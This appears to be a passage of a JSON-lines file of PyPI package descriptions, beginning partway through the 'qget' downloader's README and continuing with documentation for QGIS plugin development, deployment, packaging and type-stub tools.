used.\nprogress_ref (ProgressState, optional): Reference to progress state.\n If passed all parts bytes and rewrite status will be updated in it. Defaults to None.\nmax_connections (int, optional): Maximum amount of asynchronous HTTP connections. Defaults to 50.\nconnection_test_sec (int, optional): Maximum time in seconds assigned to test\n how much asynchronous connections can be achieved to URL.\n If set to 0 test will be omitted. Defaults to 5.\nchunk_bytes (int, optional): Chunk of data read in iteration from url and save to part file in bytes.\n Will be used also when rewriting parts to output file. If limit is supplied this can be override for\n stream iteration. Defaults to 2621440.\nmax_part_mb (float, optional): Desirable (if possible) max part size in megabytes. Defaults to 5.\nretries (int, optional): Retries number for part download. Defaults to 10.\nretry_sec (int, optional): Time to wait between retries of part download in seconds. Defaults to 1.\nlimit (str, optional): Download rate limit in MBps. Can be supplied with unit as \"Nunit\", eg. \"5M\".\n Valid units (case insensitive): b, k, m, g, kb, mb, gb. 0 bytes will be treat as no limit.\n Defaults to None.\ntmp_dir (str, optional): Temporary directory path. If not set it points to OS tmp directory.\n Defaults to None.\ndebug (bool, optional): Debug flag. Defaults to False.To use in code simply import module function:fromqgetimportqgeturl=\"https://speed.hetzner.de/100MB.bin\"qget(url)To use in code with own loop andasyncio:importasynciofromqgetimportqget_coroasyncdefmain(loop):url=\"https://speed.hetzner.de/100MB.bin\"download_task=loop.create_task(qget_coro(url))awaitdownload_task# Or just# await qget_coro(url)loop=asyncio.get_event_loop()loop.run_until_complete(main(loop))loop.close()Progress hooksUsage for progress hooks (by default hooks are used to displaytqdmprogress bar):fromqgetimportProgressState,qgetdefprint_download_progress(progress:ProgressState)->None:print(f\"Download:{progress.get_download_progress():.2f}%\",end=\"\\r\")ifprogress.get_download_bytes()==progress.total_bytes:print()defprint_rewrite_progress(progress:ProgressState)->None:print(f\"Rewrite:{progress.get_rewrite_progress():.2f}%\",end=\"\\r\")ifprogress.rewrite_bytes==progress.total_bytes:print()url=\"https://speed.hetzner.de/100MB.bin\"progress=ProgressState(on_download_progress=print_download_progress,on_rewrite_progress=print_rewrite_progress)qget(url,progress_ref=progress)Command lineusage: qget [-h] [-o FILEPATH] [-f] [-a AUTH] [--no-verify] [--no-mock]\n [--proxy PROXY_URL] [-H HEADER] [-c MAX_CONNECTIONS]\n [--test CONNECTION_TEST_SEC] [--bytes CHUNK_BYTES] [--part MAX_PART_MB]\n [--retries RETRIES] [--retry_sec RETRY_SEC] [--limit LIMIT] [--tmp TMP_DIR]\n [--debug] [-v]\n url\n\nDownloads resource from given URL in buffered parts using asynchronous HTTP connections\nwith aiohttp session.\n\npositional arguments:\n url URL of resource\n\noptions:\n -h, --help show this help message and exit\n -o FILEPATH, --output FILEPATH\n Output path for downloaded resource.\n -f, --force Forces file override for output.\n -a AUTH, --auth AUTH String of user:password pair for SSL connection.\n --no-verify Disables SSL certificate validation.\n --no-mock Disables default User-Agent header.\n --proxy PROXY_URL HTTP/SOCKS4/SOCKS5 proxy url in format\n 'protocol://user:password@ip:port'.\n -H HEADER, --header HEADER\n Custom header in format 'name:value'. Can be supplied multiple\n times.\n -c MAX_CONNECTIONS, --connections MAX_CONNECTIONS\n Maximum amount of asynchronous HTTP connections.\n --test CONNECTION_TEST_SEC\n Maximum time in seconds assigned to test how much asynchronous\n connections can be achieved to URL. Use 0 to skip.\n --bytes CHUNK_BYTES Chunk of data read in iteration from url and save to part file in\n bytes. Will be used also when rewriting parts to output file.\n --part MAX_PART_MB Desirable (if possible) max part size in megabytes.\n --retries RETRIES Retries number for part download.\n --retry_sec RETRY_SEC Time to wait between retries of part download in seconds.\n --limit LIMIT Download rate limit in MBps. Can be supplied with unit as 'Nunit',\n eg. '5M'. Valid units (case insensitive): b, k, m, g, kb, mb, gb.\n 0 bytes will be treat as no limit.\n --tmp TMP_DIR Temporary directory path. If not set it points to OS tmp\n directory.\n --debug Debug flag.\n -v, --version Displays actual version of qget.Can be used also from python module with same arguments as for binary:python-mqgethttps://speed.hetzner.de/100MB.binMultiple headers can be supplied as follow:python-mqget-H'name1:value1'-H'name2:value2'https://speed.hetzner.de/100MB.binNotesLimiterLimiter tries to reduce rate of downloaded bytes by adding pauses between iteration over resource content.\nIf very low download rate is requested try to lower connections amount (max_connectionsor--connectionsMAX_CONNECTIONS) to achieve better accuracy for limit.Part sizePart size is calculated in runtime based on resource size in bytes and maximum amount of asynchronous\nconnections set by user (or connection test). Max part size param (max_part_mbor--partMAX_PART_MB)\nsupplied by user is use as a top limit for calculated value.part_bytes = min(resource_bytes/connections, max_part_bytes)History0.1.7 (2023-05-15)Added retries and retry_sec parameter validation.0.1.6 (2023-05-15)Fixed multiple logging handlers created with multiple qget calls.Added retries for connection errors during async downloading.0.1.5 (2023-01-25)Updated copyright note.0.1.4 (2022-08-25)Added support for SOCKS4(a), SOCKS5(h), HTTP (tunneling) proxy.Added argument position mixing for command line usage.0.1.1 (2022-06-09)Added rate limiter with multiple unit support.Added version flag for command line usage.Renamed \u2013no-ssl flag to \u2013no-verify.0.0.8 (2022-06-04)Added User-Agent mock settings.Added custom headers support.Fixed auth validation.Fixed error messages in validation.Changed command line arguments for flags (used \u2018-\u2019 instead of \u2018_\u2019).0.0.6 (2022-05-31)Added HTTPS support.Fixed fallback to GET request on failed HEAD Content-Length read.Fixed binary build scripts.0.0.1 (2022-05-31)Initial version."} +{"package": "qg-eureka", "pacakge-description": "python \u8fde\u63a5 EUREKA"} +{"package": "qgis2to3", "pacakge-description": "No description available on PyPI."} +{"package": "qgiscommons", "pacakge-description": "No description available on PyPI."} +{"package": "qgis-deployment-toolbelt", "pacakge-description": "QGIS Deployment CLICross-platform (but Windows focused) CLI to perform deployment operations related to QGIS: profiles, plugins, etc.Try it quicklyUsing Python and the officiel package installerpip:pipinstallqgis-deployment-toolbelt\nqdt-shttps://github.com/Guts/qgis-deployment-cli/raw/main/examples/scenarios/demo-scenario.qdt.ymlOr using a pre-built executable (downloadablethrough releases assets), for example on Windows:QGISDeploymentToolbelt_0-27-0_Windows.exe-shttps://github.com/Guts/qgis-deployment-cli/raw/main/examples/scenarios/demo-scenario.qdt.ymlLook for new icons in start menu or desktop!Interested? For further details,read the documentation:books:.ContributeRead thecontribution guidelinesand the documentation."} +{"package": "qgis-plugin-ci", "pacakge-description": "QGIS Plugin CIContains scripts to perform automated testing and deployment for QGIS plugins.\nThese scripts are written for and tested on GitHub, Travis-CI, github workflows and Transifex.Deploy plugin releases on QGIS official plugin repositoryPublish plugin in Github releases, option to deploy a custom repositoryEasily integrated in Travis-CI or github workflowsCompletely handle translations with Transifex:create the project and the languagespull and push translationsall TS/QM files can be managed on the CI, thei18nfolder can be omitted from the Git repositorychangelogsection in the metadata.txt can be populated if the CHANGELOG.md is presentset theexperimentalflag according to the tag if needed:book: For further information, seethe documentation.QGIS-Plugin-CI is best served if you use these two conventions :Semantic versioningKeep A ChangelogCommand lineusage: qgis-plugin-ci [-h] [-v]\n {package,changelog,release,pull-translation,push-translation}\n ...\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print the version and exit\n\ncommands:\n qgis-plugin-ci command\n\n {package,changelog,release,pull-translation,push-translation}\n package creates an archive of the plugin\n changelog gets the changelog content\n release release the plugin\n pull-translation pull translations from Transifex\n push-translation update strings and push translationsRequirementsThe code is under agitrepository (git archiveis used to bundle the plugin).There is no uncommitted changes when doing a package/release (althought there is an option to bypass this requirement).A configuration at the top directory either in.qgis-plugin-cior insetup.cfgorpyproject.tomlwith a[qgis-plugin-ci]section (seedocs/configuration/options.mdfor details).The source files of the plugin are within a sub-directory with ametadata.txtfile with the following fields:descriptionqgisMinimumVersionrepositorytrackerSeeparameters.pyfor more parameters and details. Notice that the name of this directory will be used for the zip file.QRC and UI filesAny .qrc file in the source top directory (plugin_path) will be compiled and output as filename_rc.py. You can then import it usingimport plugin_path.resources_rcCurrently, qgis-plugin-ci does not compile any .ui file.Publishing pluginsWhen releasing, you can publish the plugin :In the official QGIS plugin repository. You need to provide user name and password for your Osgeo account.As a custom repository in Github releases and which can be added later in QGIS. The address will be:https://github.com/__ORG__/__REPO__/releases/latest/download/plugins.xmlBoth can be achieved in the same process.Pre-release and experimentalIn the case of a pre-release (either from the tag name according toSemantic Versioningor from the GitHub release), the plugin will be flagged as experimental.The tool will recognise any label use as a suffix to flag it as pre-release :10.1.0-beta13.4.0-rc.2DebugIn any Python module, you can have a global variable asDEBUG = True, which will be changed toFalsewhen packaging the plugin.Other toolsQGIS-Plugin-RepoQGIS-Plugin-CI can generate theplugins.xmlfile, per plugin.\nIf you want to merge many XML files into one to have a single QGIS plugin repository providing many plugins,\nyou should checkQGIS-Plugin-Repo.\nIt's designed to run on CI after QGIS-Plugin-CI."} +{"package": "qgis-plugin-dev-tools", "pacakge-description": "qgis-plugin-dev-toolsQGIS plugin development and packaging tools, which make managing runtime dependencies easy.PrerequisitesYour plugin package must be available to import from the python environment this tool is run in. For example, runningpython -c \"import your_plugin_package_name\"should not fail. Additionally, any dependency libraries must also be available in the python environment, so a dependency tosome_pypi_packageneeds something likepip install some_pypi_packagefor this tool to work.LimitationsBundling works by copying the code as-is and replacing the imports in all bundled files, so native library dependencies and other special cases might not work. To be safe, only depend on pure python libraries. Also verify the result zip works, since some import statements orsys.modulesusage might not be supported.SetupInstall this library withpip install qgis-plugin-dev-tools.Create apyproject.tomltool section:[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"If the plugin runtime depends on external libraries, add the distribution names toruntime_requireslist as abstract dependencies.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package\"]If the plugin runtime dependencies have many dependencies themselves, it is possible to include those recursively withauto_add_recursive_runtime_dependencies. Alternatively, all the requirements can be listed inruntime_requires.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package\"]auto_add_recursive_runtime_dependencies=trueIf the plugin runtime dependencies do not work with the aforementioned configuration, the dependencies can be added to the Python Path withuse_dangerous_vendor_sys_path_appendflag. This method might beunsafeif there are conflicts between dependency versions of different plugins.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package_with_binary_files\"]use_dangerous_vendor_sys_path_append=trueBy default build version number is read from changelog top-most second level heading having format## version anything. This behaviour is configurable withversion_number_sourceto use plugin package distribution metadata. Optionally, the version number can also be provided as an argument for the build script usingqpdt b --version 0.1.0-rc2.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"version_number_source=\"distribution\"# or \"changelog\" (default if missing)Plugin packagingRunqgis-plugin-dev-tools build(shortqpdt b) to package the plugin and any runtime dependencies to a standard QGIS plugin zip file, that can be installed and published.By default config is read frompyproject.toml, changelog notes fromCHANGELOG.md, version from changelog, and package is created in adistdirectory in the current working directory. Changelog contents and version number are inserted to themetadata.txtfile, so the version and changelog sections do not need manual updates.Plugin publishingRunqgis-plugin-dev-tools publish (shortqpdt publish ) to publish a previously built plugin zip file to QGIS plugin repository.By default username and password are read fromQPDT_PUBLISH_USERNAMEandQPDT_PUBLISH_PASSWORDenvironment variables.Plugin development modeRunqgis-plugin-dev-tools start(shortqpdt s) to launch QGIS with the plugin installed and ready for development.By default config is read frompyproject.tomland runtime config from.envin the current working directory. Extra environment files can be passed using-eflag..envmust configure the executable path, and may configure debugger, profile name and any extra runtime variables necessary for the plugin.QGIS_EXECUTABLE_PATH=# path to qgis-bin/qgis-bin-ltr or .exe equivalents, necessary# DEBUGGER_LIBRARY= # debugpy/pydevd to start a debugger on init, library must be installed to the environment# DEVELOPMENT_PROFILE_NAME= # name of the profile that qgis is launched with, otherwise uses default# any other variables are added to the runtime QGIS environment# SOMETHING=somethingDevelopment mode bootstraps the launched QGIS to have access to any packages available to the launching python environment, setups enviroment variables, configures a debugger, and installs and enables the developed plugin package.Additionally editable installs for the plugin dependencies are supported. For example with a dependency tosome_pypi_package, usepip install -e /path/to/some_pypi_packageto providesome_pypi_packagein editable mode from a local directory, and usePlugin Reloaderto refresh new code when its changed on disk. This will also reload the declared dependencies.Developing multiple pluginsDevelopment mode also enables using and developing multiple plugins easily if certain requirements are satisfied for all extra plugins:Extra plugin must be installable python packagesSee e.g.Quickstart for setuptoolsExtra plugin must have entry point in group \"qgis_plugin_dev_tools\"See for example:Entry point usage with setuptoolsUse plugin package name for entry point nameExtra plugin needs to be installed in the same python environment where this tool is run inExtra plugins are loaded on launch and reloaded together with the main plugin ifPlugin Reloaderis used.Development of qgis-plugin-dev-toolsSeedevelopment readme.License & copyrightLicensed under GNU GPL v3.0.Copyright (C) 2022National Land Survey of Finland.ChangelogAll notable changes to this project will be documented in this file.The format is based onKeep a Changelog, and this project adheres toSemantic Versioning.0.6.2- 2023-09-27Fix: Fix issues with bundling requirements of the requirements recursively0.6.1- 2023-09-06update author email0.6.0- 2023-02-17Feat: Support dependencies having package references in .ui files0.5.0- 2022-11-09Feat: Add publish command to cliFix: Support build without actually importing the codeFix: Preserve case for key names in metadata file0.4.0- 2022-11-01Feat: Add an option to get version from distribution metadataFix: Rewrite imports correctly when dependency name is a prefix of the plugin package name0.3.0- 2022-09-02Feat: Add an option to append vendor package to the Python PathFeat: Add an option to bundle requirements of the requirements recursivelyFeat: Add module packages and .pyd files to the bundle if foundFeat: Add version as an optional build argumentChore: Drop support from Python < 3.90.2.1- 2022-07-07Fix: Correct some plain import rewrites0.2.0- 2022-06-13Feat: enable extra plugins in development mode0.1.2- 2022-05-30Fix: use UTF-8 encoding for file reads/writes0.1.1- 2022-05-16Fix: rewrite runtime requirement imports correctly0.1.0- 2022-05-12Initial release:startandbuildcommands with minimal configuration options."} +{"package": "qgis-plugin-manager", "pacakge-description": "QGIS-Plugin-ManagerMainly designed for QGIS Server plugins, but it works also for desktop.Not tested on Windows.TheCLIAPI is not stable yet.InstallationPython 3.7minimum, you can make a Python venv if needed.python3--versionpip3installqgis-plugin-manager\npython3-mpipinstallqgis-plugin-managerEnvironment variablesQGIS-Plugin-Manager will take care of following variables :QGIS_PLUGIN_MANAGER_SOURCES_FILEfor storing a path to thesources.listotherwise, the current folder will be used.QGIS_PLUGIN_MANAGER_CACHE_DIRfor storing all XML files downloaded otherwise, the current folder will be used.cache_qgis_plugin_managerQGIS_PLUGIN_MANAGER_SKIP_SOURCES_FILE, boolean when we do not need asources.listfile, for instance to list plugins onlyQGIS_PLUGIN_MANAGER_RESTART_FILE, path where the file must be created if QGIS server needs to be restarted.\nReadthe documentation.QGIS_PLUGINPATHfor storing plugins, fromQGIS Server documentationPYTHONPATHfor importing QGIS librariesUtilisationEitheryou need to go in the directory where you are storing plugins,oryou can use the environment variableQGIS_PLUGINPATH.\nYou can read thedocumentationon QGIS Server about this variable.cd/path/where/you/have/plugins# usually on a servercd/usr/lib/qgis/plugins# on unix desktop with the default QGIS profilecd/home/${USER}/.local/share/QGIS/QGIS3/profiles/default/python/plugins# orexportQGIS_PLUGINPATH=/path/where/you/have/plugins$qgis-plugin-manager--help\nusage:qgis-plugin-manager[-h][-v]{init,list,remote,remove,update,upgrade,cache,search,install}...\n\noptions:-h,--helpshowthishelpmessageandexit-v,--versionshowprogram'sversionnumberandexitcommands:qgis-plugin-managercommand{init,list,remote,remove,update,upgrade,cache,search,install}initCreatethe`sources.list`withplugins.qgis.orgasremotelistListallpluginsinthedirectoryremoteListallremoteserverremoveRemoveapluginbyitsnameupdateUpdateallindexfilesupgradeUpgradeallpluginsinstalledcacheLookforaplugininthecachesearchSearchforpluginsinstallInstallapluginInitTo create the firstsources.listin the directory with at least the default repositoryhttps://plugins.qgis.org:$qgis-plugin-managerinit\n$catsources.listhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.19You can have one or many servers, one on each line.ListList all plugins installed :$qgis-plugin-managerlist\nQGISserverversion3.19.0\nListallpluginsin/home/etienne/dev/qgis/server_plugin\n\n------------------------------------------------------------------------------------------------------------------------------------|Name|Version|Flags|QGISmin|QGISmax|Author|Folderowner|Action\u26a0|------------------------------------------------------------------------------------------------------------------------------------|Lizmap|master||3.4|3.99|3Liz|root:0o755|Unkownversion||wfsOutputExtension|1.5.3|Server|3.0||3Liz|etienne:0o755|||QuickOSM|1.14.0|Processing|3.4|3.99|EtienneTrimaille|etienne:0o755|Upgradeto1.16.0||cadastre|1.6.2|Server,Processing|3.0|3.99|3liz|www-data:0o755|||atlasprint|3.2.2|Server|3.10||3Liz|www-data:0o755||------------------------------------------------------------------------------------------------------------------Install needed plugins only, mainly on QGIS serverImportant note, installonlyplugins you needyou. On QGISdesktop, plugins can slow down your computer.\nOn QGISserver, plugins are likehooksinto QGIS server, they can alter input or output of QGIS server.\nThey can produceunexpectedresult if you don't know how the plugin works. Please refer to their respective documentation\nor the application that needs QGIS server plugins (for instance,plugins for Lizmap Web Client)Remote$qgis-plugin-managerremote\nListofremotes:\n\nhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.22\n\n$catsources.listhttps://plugins.qgis.org/plugins/plugins.xml?qgis=[VERSION][VERSION]is a token in thesources.listfile to be replaced by the QGIS version, for instance3.22.\nIf QGIS is upgraded, the XML file will be updated as well.You don't have to set the TOKEN for all URL :https://docs.3liz.org/plugins.xmlis valid.Basic authenticationIt's possible to add a login and password in the remote URL, withusernameandpasswordin the query string :https://docs.3liz.org/private/repo.xml?username=login&password=passEvery URL is parsed, and if some credentials are found, the URL is cleaned and the request is done using the\nbasic authentication.UpdateTo fetch the XML files from each repository :$qgis-plugin-managerupdate\nDownloadinghttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.19...Ok\n$ls.cache_qgis_plugin_manager/\nhttps-plugins-qgis-org-plugins-plugins-xml-qgis-3-19.xmlCacheCheck if a plugin is available :$qgis-plugin-managercacheatlasprint\nPluginatlasprint:v3.2.2availableSearchLook for plugins according to tags and title :$qgis-plugin-managersearchdataviz\nDataPlotly\nQSoccerInstallPlugins are case-sensitive and might have spaces in its name :$qgis-plugin-managerinstalldataplotly\nPlugindataplotlylatestnotfound.\nDoyoumeanmaybe'Data Plotly'?\n$qgis-plugin-managerinstall'Data Plotly'Install the latest version :$qgis-plugin-managerinstallQuickOSM\nInstallationQuickOSMlatestOkQuickOSM.1.16.0.zipor a specific version :$qgis-plugin-managerinstallQuickOSM==1.14.0\nInstallationQuickOSM1.14.0OkQuickOSM.1.14.0.zipYou can use--forceor-fto force the installation even if the plugin with the same version is already installed.Enable a pluginOn QGISserver, there isn't any setting to enable/disable a plugin.However, ondesktop, you still need to enable a plugin, the equivalent of the checkbox in the QGIS graphical plugin\nmanager.For instance, with the default profile, usually located in :/home/${USER}/.local/share/QGIS/QGIS3/profiles/default/QGIS/you need to edit theQGIS.inifile with :[PythonPlugins]nameOfThePlugin=trueUpgradeUpgrade all plugins installed :$qgis-plugin-managerupgradeYou can use--forceor-fto force the upgrade for all plugins despite their version.Note, like APT,updateis needed before to refresh the cache.Ignore plugins from the upgradeSome plugins might be installed by hand, without being installed with a remote. This command will try to upgradeall validplugins found in the directory. However, the command will fail because the plugin has been installed\nwithout a remote.It's possible to ignore such plugin by adding a fileignorePlugins.list, in your plugins' folder,\nwith a list ofplugin nameon each line. Theupgradewill not try to upgrade them.RemoveIt's possible to userm -rf folder_dirbut you can also remove by the plugin name.\nIt will take care of theQGIS_PLUGINPATHenvironment variable.$qgis-plugin-managerremoveQuickosm\nPluginname'Quickosm'notfound\nDoyoumeanmaybe'QuickOSM'?\n$qgis-plugin-managerremoveQuickOSM\nPluginQuickOSMremoved\nTip:DonotforgettorestartQGISServertoreloadplugins\ud83d\ude0eNotify upstream if a restart is neededWhen a plugin is installed or removed and if the environment variableQGIS_PLUGIN_MANAGER_RESTART_FILEis set,\nan empty file will be created or touched. It can notify you if QGIS Server needs to be restarted for instance.Note that you must manually remove this file.Run testsexportPYTHONPATH=/home/etienne/dev/app/qgis-master/share/qgis/python/:/usr/lib/python3/dist-packages/cdtestpython3-munittest\nflake8"} +{"package": "qgispluginreleaser", "pacakge-description": "qgispluginreleaserAdd-on for zest.releaser for releasing QGIS plugins.Zest.releaser can be extended, see itsentrypoints documentation.What we do:We hook into the \u201crelease\u201d step and create a zipfile with a version number\nand copy it to the current directory. You can scp it to a server afterwards.In the \u201cprerelease\u201d and \u201cpostrelease\u201d steps we change the version number in\nthe (mandatory) QGISmetadata.txtfile.Note: a QGIS plugin doesn\u2019t have asetup.py, so you\u2019ll need to add aversion.txtorversion.rstorVERSIONfile so that zest.releaser\nrecognizes the current directory as a releasable project and so that it can\nfind the version number somewhere. Simply put the version number (\u201c1.2\u201d) by\nitself on the first line. A newline at the end is fine.InstallationYou\u2019ll have to install it globally (or in a custom virtualenv) as qgis plugins\nnormally don\u2019t have a full python setup.The plugin checks whether there\u2019s ametadata.txt(lowercase) with aqgisMinimumVersionstring inside it. If found, the plugin runs. Otherwise\nit stays out of the way. So it should be safe to install globally.CreditsReinout van Rees started this library.Changelog of qgispluginreleaser1.1 (2020-05-25)Allow themetadata.txtto also be one subdirectory deeper.1.0 (2017-06-20)Use the codecs package in conjunction with \u201cutf8\u201d to read and write files.0.2 (2016-02-01)Qgis expects zip filenames to use a dot as name/version separator instead of\na dash. We now create the zipfile with a dot instead.0.1 (2016-01-19)Initial project structure created with nensskel.Changing versions in metadata.txt in the prerelease/postrelease step.Creating a zipfile (with version number in the filename) automatically in\nthe release step. Note that you must answer \u201cyes\u201d to the \u201ccheckout a tag?\u201d\nquestion."} +{"package": "qgis-plugin-repo", "pacakge-description": "QGIS-Plugin-RepoPresentationMerge some QGIS plugin repository togetherSingle QGIS repositoryqgis-plugin-repomergeoutput_qgis_plugin_ci.xmlall_plugins.xml\nqgis-plugin-repomergehttps://path/to/plugins_to_add.xmlall_plugins.xmlThe fileall_plugins.xmlwill be edited, according to the plugin name, plugin\nversion and its experimental flag or not. In an XML file, the plugin can have\ntwo versions : one experimental and the other one not.Many QGIS repositoriesYou can also have multiple XML files like :qgis/\n\u251c\u2500\u2500plugins-3.4.xml\n\u251c\u2500\u2500plugins-3.10.xml\n\u251c\u2500\u2500plugins-3.16.xml\n\u251c\u2500\u2500plugins-3.22.xml\n\u2514\u2500\u2500plugins-3-28.xmlThen, it's possible to callqgis-plugin-repoto dispatch an XML plugin in matching QGIS XML files :qgis-plugin-repo merge output_qgis_plugin_ci.xml plugins-*.xmlAccording to QGIS minimum/maximum versions hardcoded in the XML (and therefore in the metadata.txt), only corresponding\nQGIS XML files will be edited.For now, only plugins between3.0and3.99and without a patch QGIS version number are supported.Read a QGIS repositoryYou can read an XML file :qgis-plugin-reporeadhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.10GitHub ActionsThe main purpose of this tool is to run on CI.In the plugin repository, afterQGIS-Plugin-CI:- name: Repository Dispatch\n uses: peter-evans/repository-dispatch@v1\n with:\n token: ${{ secrets.TOKEN }}\n repository: organisation/repository\n event-type: merge-plugins\n client-payload: '{\"name\": \"NAME_OF_PLUGIN\", \"version\": \"${{ env.RELEASE_VERSION }}\", \"url\": \"URL_OF_LATEST.xml\"}'Notethat QGIS-Plugin-CIpackageorreleasemust be been called with--create-plugin-repobecause this\ntool will use the XML file generated.In the main repository with adocs/plugins.xmlto edit :name:\ud83d\udd00 Plugin repositoryon:repository_dispatch:types:[merge-plugins]jobs:merge:runs-on:ubuntu-lateststeps:-run:>echo ${{ github.event.client_payload.name }}echo ${{ github.event.client_payload.version }}echo ${{ github.event.client_payload.url }}-name:Get source codeuses:actions/checkout@v2with:fetch-depth:0token:${{ secrets.BOT_HUB_TOKEN }}# Important to launch CI on a commit from a bot-name:Set up Python 3.8uses:actions/setup-python@v2.2.2with:python-version:3.8-name:Install qgis-plugin-reporun:pip3 install qgis-plugin-repo-name:Mergerun:qgis-plugin-repo merge ${{ github.event.client_payload.url }} docs/plugins.xml-name:Commit changesuses:stefanzweifel/git-auto-commit-action@v4with:commit_message:\"PublishQGISPlugin${{github.event.client_payload.name}}${{github.event.client_payload.version}}\"commit_user_name:${{ secrets.BOT_NAME }}commit_user_email:${{ secrets.BOT_MAIL }}commit_author:${{ secrets.BOT_NAME }}Testscdtests\npython-munittest"} +{"package": "qgis-plugins", "pacakge-description": "An app for serving up a QGIS Plugin Repositorytest"} +{"package": "qgis-plugin-tools", "pacakge-description": "QGIS Plugin toolsWarning: The API is not stable yet. Function and files may move between commits.As it's a submodule, you can configure your GIT to auto update the submodule commit by running:git config --global submodule.recurse trueThe module is helping you with:setting up some logging(QgsMessageLog, file log, remote logs...)fetching resourcesinresourcesor other foldersfetching compiled UI fileinresources/uifolderfetching compiled translation file inresources/i18nfolderremoving QRC resources file easilytranslate using thei18n.tr()function.managing the release process : zip, upload on plugins.qgis.org, tag, GitHub releaseproviding some common widgets/code for pluginssetting up a debug serverHow to install itFor a new pluginThis will create needed structure for your pluginCreate new plugin usingcookiecutter-qgis-plugin.\nThis will automatically initialize git and add qgis_plugin_tools as a submodule for the plugin.Next set up thedevelopment environment,\nedit metadata.txt with description etc. and commit changes.For existing pluginGo to the root folder of your plugin code sourcegit submodule add https://github.com/GispoCoding/qgis_plugin_tools.gitTo get most out of the submodule, try to refactor the plugin to use the defaultplugin treeAs external dependencyThis project can also be used as an external dependency. It can be installed via pip:pipinstallqgis_plugin_toolsThe project can also be installed in editable mode, but you must use setuptool's strict mode\nbecause of the submodule nature of the project:pip install -e /path/to/qgis_plugin_tools --use-pep517 --config-settings editable_mode=strictSetting up development environmentRefer todevelopmentdocumentation.How to use itRefer tousagedocumentation.Plugin tree exampleThe plugin should follow the following file tree to get most out of this module.PluginFooroot folder:plugin_repo#no '-' character!.gitmodules.pre-commit-config.yaml.gitattributes.gitignore.qgis-plugin-ci# to useqgis-plugin-cipluginname#no '-' character!.gitignoreqgis_plugins_tools/# submoduleresources/i18n/# Alternatively translations could useTransifexfi.tsfi.qmui/main_dialog.uiicons/my_icon.svg__init__.pyfoo.pymetadata.txtbuild.pytest/"} +{"package": "qgis-plutil", "pacakge-description": "plutilplutil is anopen source,\nMIT licensed library useful for writing QGis plugins.Installpip install qgis-plutilYou can also download/clone the source, in which case you have to:git clone https://github.com/pyqgis/plutil.git\npython setup.py installTo contribute a patch clone the repo, create a new branch, install in\ndevelop mode:python setup.py develop"} +{"package": "qgisstepsbar", "pacakge-description": "No description available on PyPI."} +{"package": "qgisstepui", "pacakge-description": "No description available on PyPI."} +{"package": "qgis-stubs", "pacakge-description": "Type Stubs for QGISThis package defines Python stub files (.pyi) for thePyQGISwrapper module available inQGIS.OverviewThe bulk of theqgismodule is aSIP-generated wrapper over a C++ source that is only available at runtime. This means that developers are \"flying blind\" when writing code that uses theqgismodule.Type stubs are a declaration-only replication of the module interface that can be parsed by IDEs, linters, or static type checkers likeMypyorPylanceto provide the same functionality available for regular Python sources.InstallationThe qgis-stubs package can be installed through pip:python-mpipinstallqgis-stubsAlternatively, you may clone and install the latest version using the repository link:python-mpipinstallgit+https://github.com/leonhard-s/qgis-stubs.gitCaveats & LimitationsThe Python modules used by QGIS are not without issues. Most of these are shared by the runtime implementation but are explicitly listed here to avoid confusion.Theqgis.3dnamespace is not valid Python syntax as it starts with a number. At runtime, this module is instead available under theqgis._3dname, and the stub files replicate this behaviour.This may lead to errors/warnings due to apparent protected access of client code, which must be silenced using# type: ignoreand/or# pylint: disable=protected-accesscomments.Some classes useNoneas the name of a member, leading to invalid Python syntax such asDataResamplingMethod.None.Use of the built-ingetattr()function together with custom type annotations can be used to work around this issue:None_:DataResamplingMethod=getattr(DataResamplingMethod,'None')Compatibility fallback names for unscoped enumerators are not available as they are \"monkey-patched\" at runtime.It was decided not to include these patches in the stubs as they lead to naming collisions.This module usesPyQt5-stubsfor its Qt types, which does not support thePyQt5.Qscisubmodule. As a result, any classes derived from theQscinamespace are typed asAnyand not checked.ContributingThis repository contains an automated type stub generator, but new releases still require some manual edits depending on the version of QGIS targeted. Support for new QGIS versions is therefore not automatic.If you encounter any issues such as missing or incorrect type hints or wish for this utility to be updated for a new version of QGIS, please docreate an issue."} +{"package": "qgis-venv-creator", "pacakge-description": "QGIS Venv CreatorSingle file and zero dependency tool to create a Python virtual environment for QGIS plugin development.Table of ContentsInstallationUsageDevelopmentLicenseInstallationThe recommended way to installqgis-venv-creator(and other Python cli tools) is to install it withpipx. Pipx will install the application in an isolated environment and make it available as a command line utility. To installpipx, follow the instructions provided athttps://github.com/pypa/pipx#install-pipx.$pipxinstallqgis-venv-creatorAlternatively, to install in your current Python environment:$pipinstallqgis-venv-creatorCopy as a scriptqgis-venv-creatoris a single Python script that can be downloaded and copied to your project root, or any other location from which you wish to use it.UsageQuick startOn your plugin root directory, run:$create-qgis-venvNote:If you have copied the script file to your project root, you can run it withpython create-qgis-venv.py.On a system where there might be multiple QGIS installations (ie. Windows, MacOs), you are asked to select the one you want to use for development.After the virtual environment is created, you can activate it and it will have access to the QGIS Python environment.Optionscreate-qgis-venv [-h] [--venv-parent VENV_PARENT] [--venv-name VENV_NAME]\n [--qgis-installation QGIS_INSTALLATION]\n [--qgis-installation-search-path-pattern QGIS_INSTALLATION_SEARCH_PATH_PATTERN]\n [--python-executable PYTHON_EXECUTABLE] [--debug]OptionAvailable on platformDescription-h, --helpALLShow this help message and exit--venv-parentALLPath to the parent directory of the virtual environment to be created. Most likely your project directory. Default current directory.--venv-nameALLName of the virtual environment--qgis-installationWindowsPath to the QGIS installation to use for development. Installations made with official msi and Osgeo4W installers are supported. Give the path to the 'qgis' directory inside the 'apps' directory. If not given, the user is prompted to select one.--qgis-installation-search-path-patternWindowsCustom glob pattern for QGIS installations to be selected. Can be set also with environment variable QGIS_INSTALLATION_SEARCH_PATH_PATTERN. For example \"C:\\qgis\\*\\apps\\qgis*\\\" to find installations from \"C:\\qgis\\3.32\\apps\\qgis\\\" and 